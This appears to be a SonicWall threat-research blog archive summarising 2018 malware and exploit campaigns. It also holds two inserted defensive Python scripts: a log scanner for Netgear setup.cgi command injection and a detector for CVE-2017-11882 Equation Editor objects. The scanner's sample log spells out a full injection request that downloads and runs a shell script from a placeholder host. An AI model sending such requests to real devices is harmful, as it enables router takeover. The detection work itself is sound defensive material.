A widely used jQuery plugin, ‘jQuery-File-Upload’ (also known as Blueimp), contains a critical vulnerability that allows attackers to perform remote code execution. The flaw has existed for several years and potentially puts the roughly 7,800 projects forked from this plugin at risk. Attackers have been actively exploiting it, but it was disclosed only recently. SonicWall…
Month: October 2018
FlawedAmmyy RAT delivered through fake invoice emails in large numbers (October 20, 2018)
SonicWall Threat Research Lab has observed a phishing campaign sending fake invoice emails in large numbers. Both the email messages and the attached documents are crafted with social-engineering lures to get recipients to open the attachment and enable macros; the FlawedAmmyy RAT appears to be the final payload.
Figure 1: Infection chain of the phishing campaign
On…
Panini Adware for Android soaks network bandwidth, bad news for users with limited data (October 18, 2018)
Android adware campaign – Panini – consumes network data at a high rate once it begins execution…
Trojan uses EternalBlue to install cryptominer (October 13, 2018)
Interest in cryptocurrencies has not wavered despite a period of sinking market values. Cybercriminals are still ramping up efforts to obtain Blockchain assets in the hopes that their values could spike back up again in the future. While ransomware is still around, we have observed that cryptocurrency mining is increasingly being favored by cybercriminals as…
Emotet malware spreading via IRS-themed spam email (October 9, 2018)
The SonicWall RTDMI engine detected an archive attachment containing malicious Word documents inside spam email purporting to come from the IRS…
Massive IoT attack targeting unpatched Netgear devices (October 6, 2018)
SonicWall Threat Research Lab has recently spotted a massive IoT attack attempting to exploit a remote code execution vulnerability in Netgear DGN series routers. It seems to have started over the weekend, and the detection rate has been spiking for the last few days. We observed over 100,000 attacks from different IP addresses attempting to exploit ~7000…
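A log-side check for this kind of campaign, added here as an example and not code from the SonicWall post: it assumes (the excerpt does not say which DGN-series flaw is being hit) that the attacks target the well-known unauthenticated `setup.cgi` command injection, where a request with `todo=syscmd` makes the router execute the `cmd=` parameter. The script parses Apache-style combined access-log lines, flags every such request, decodes the injected command and tallies source addresses. All log lines and IP addresses below are constructed from documentation ranges.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# One Apache/nginx "combined" access-log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)


def extract_syscmd(uri: str):
    """Return the shell command from a setup.cgi todo=syscmd request, else None.

    Assumption (not stated in the SonicWall excerpt): the DGN-series bug is the
    unauthenticated setup.cgi command injection, in which todo=syscmd makes the
    router run the cmd= parameter as a shell command.
    """
    parts = urlsplit(uri)
    if not parts.path.lower().endswith("setup.cgi"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if qs.get("todo", [""])[0].lower() != "syscmd":
        return None
    # parse_qs already percent-decodes and turns '+' into spaces.
    return qs.get("cmd", [""])[0]


def scan_log(lines):
    """Yield (source_ip, command) for every exploitation attempt in the log."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        cmd = extract_syscmd(m.group("uri"))
        if cmd is not None:
            yield m.group("ip"), cmd


def summarize(lines) -> dict:
    """Count attempts, distinct sources and distinct injected commands."""
    attempts = list(scan_log(lines))
    return {
        "attempts": len(attempts),
        "sources": Counter(ip for ip, _ in attempts),
        "commands": Counter(cmd for _, cmd in attempts),
    }


# Constructed sample log (documentation address ranges, no real hosts):
# two attempts from different sources, one ordinary page fetch, and one
# benign setup.cgi request without todo=syscmd.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Oct/2018:03:14:07 +0000] "GET /setup.cgi?next_file=netgear.cfg'
    '&todo=syscmd&cmd=cd+%2Ftmp%3Bwget+http%3A%2F%2F198.51.100.7%2Fbot.sh%3Bsh+bot.sh'
    '&curpath=%2F&currentsetting.htm=1 HTTP/1.1" 200 512',
    '192.0.2.20 - - [06/Oct/2018:03:15:00 +0000] "GET /index.htm HTTP/1.1" 200 2048',
    '192.0.2.30 - - [06/Oct/2018:03:15:21 +0000] "GET /setup.cgi?next_file=status.htm HTTP/1.1" 200 900',
    '192.0.2.11 - - [06/Oct/2018:03:16:42 +0000] "GET /setup.cgi?next_file=netgear.cfg'
    '&todo=syscmd&cmd=cd+%2Ftmp%3Bwget+http%3A%2F%2F198.51.100.7%2Fbot.sh%3Bsh+bot.sh'
    '&curpath=%2F&currentsetting.htm=1 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    report = summarize(SAMPLE_LOG)
    print(report["attempts"], "attempts from", len(report["sources"]), "sources")
    for cmd, n in report["commands"].most_common():
        print(n, cmd)
```

The path check uses `endswith` rather than an exact match so that `//setup.cgi` or a prefixed path still triggers; the `todo` comparison is case-insensitive because the CGI parameter parsing on the device is not guaranteed to be strict. Decoding the command rather than just counting hits is what lets you pivot to the payload host and pull the second stage for analysis.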
Most exploited vulnerabilities this month (September 29, 2018)
SonicWall Threat Research Lab has observed the vulnerabilities that have been actively exploited since the beginning of this month. Below is the list of vulnerabilities, vendor advisory information and the SonicWall signatures that protect against these exploits.
CVE-2017-11882 | Microsoft Office EQNEDT32 Stack Buffer Overflow
This is a stack buffer overflow vulnerability in Microsoft Office…
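CVE-2017-11882 is triggered through an embedded Equation Editor (EQNEDT32.EXE) OLE object, so a cheap triage step is to flag any Office or RTF attachment that carries one. The scanner below is an added example, not SonicWall's signature or code. It relies on two standard identifiers of the Equation Editor object: the `Equation.3` CLSID `{0002CE02-0000-0000-C000-000000000046}` and the `Equation Native` stream name used inside OLE compound files; for RTF it checks both `\objclass` and the hex-encoded OLE1 blob in `\objdata`, since the blob repeats the class name even when the control word has been tampered with. The sample documents are constructed byte strings, not real malware.

```python
import re

# Equation.3 CLSID {0002CE02-0000-0000-C000-000000000046} as stored in an OLE
# compound file directory entry (Data1, Data2, Data3 little-endian).
EQUATION3_CLSID = bytes.fromhex("02ce020000000000c000000000000046")
# Stream Equation Editor writes its data to; CFB stores names as UTF-16LE.
EQUATION_NATIVE_STREAM = "Equation Native".encode("utf-16-le")
# RTF control word that names an embedded object's class.
RTF_OBJCLASS = re.compile(rb"\\objclass\s*Equation\.\d", re.IGNORECASE)
# \objdata carries an OLE1 blob as hex text; the blob repeats the class name
# in ANSI, so "Equation.N" survives as hex even if \objclass was renamed.
HEX_CLASSNAME = re.compile(b"Equation.".hex().encode() + rb"3[0-9]", re.IGNORECASE)


def find_equation_objects(data: bytes) -> list:
    """Return indicator names for Equation Editor objects found in a document."""
    hits = []
    # RTF readers ignore whitespace inside hex data and attackers exploit that
    # to split signatures, so collapse whitespace before matching.
    compact = re.sub(rb"\s+", b"", data)
    if RTF_OBJCLASS.search(compact):
        hits.append("rtf-objclass-equation")
    if HEX_CLASSNAME.search(compact):
        hits.append("rtf-objdata-equation-classname")
    if EQUATION3_CLSID in data:
        hits.append("ole-clsid-equation3")
    if EQUATION_NATIVE_STREAM in data:
        hits.append("ole-stream-equation-native")
    return hits


def scan_file(path: str) -> list:
    """Convenience wrapper for scanning a file on disk."""
    with open(path, "rb") as fh:
        return find_equation_objects(fh.read())


# Constructed samples (not real malware): an RTF with an OLE1 Equation.3
# object whose hex is split across lines, a minimal OLE header followed by
# the Equation.3 CLSID, and a harmless RTF.
RTF_SAMPLE = (
    b"{\\rtf1{\\object\\objemb{\\*\\objclass Equation.3}"
    b"{\\*\\objdata 01050000 02000000 0b000000\n"
    b"4571756174696f6e2e3300 0000 0000}}}"
)
OLE_SAMPLE = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 16 + EQUATION3_CLSID
BENIGN_SAMPLE = b"{\\rtf1 Quarterly invoice attached.}"

if __name__ == "__main__":
    for name, blob in (("rtf", RTF_SAMPLE), ("ole", OLE_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, find_equation_objects(blob))
```

A hit is not proof of exploitation, since legitimate documents do embed equations, but Equation Editor objects in unsolicited invoices are rare enough that quarantining on this signal is a reasonable default; pair it with the vendor patch (the January 2018 update that removed EQNEDT32) for actual protection.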
Vigilante malware removes cryptominers from the infected device (September 22, 2018)
A malware that seeks and removes cryptominers from an infected device…
Major attempt to exploit XML-RPC remote code injection vulnerability observed (September 22, 2018)
SonicWall Threat Research Lab has recently observed a huge spike in detections for XML-RPC remote code injection: 3000+ hits in the last two days attempting to exploit 100+ web servers behind SonicWall firewalls. All of these attacks come from a single IP address, 96.68.165.185, and target servers in different countries.
XML-RPC?
XML-RPC is…
Active spam campaign spreading Feodo banking trojan spotted (September 15, 2018)
The SonicWall Capture Labs Threat Research team has been observing an active spam campaign spreading a banking Trojan widely known as Feodo. The spam uses the very common tactic of sending a fake invoice or bank statement as an attachment, with a link that leads to downloading the malware.
Infection cycle:
The spam email purports…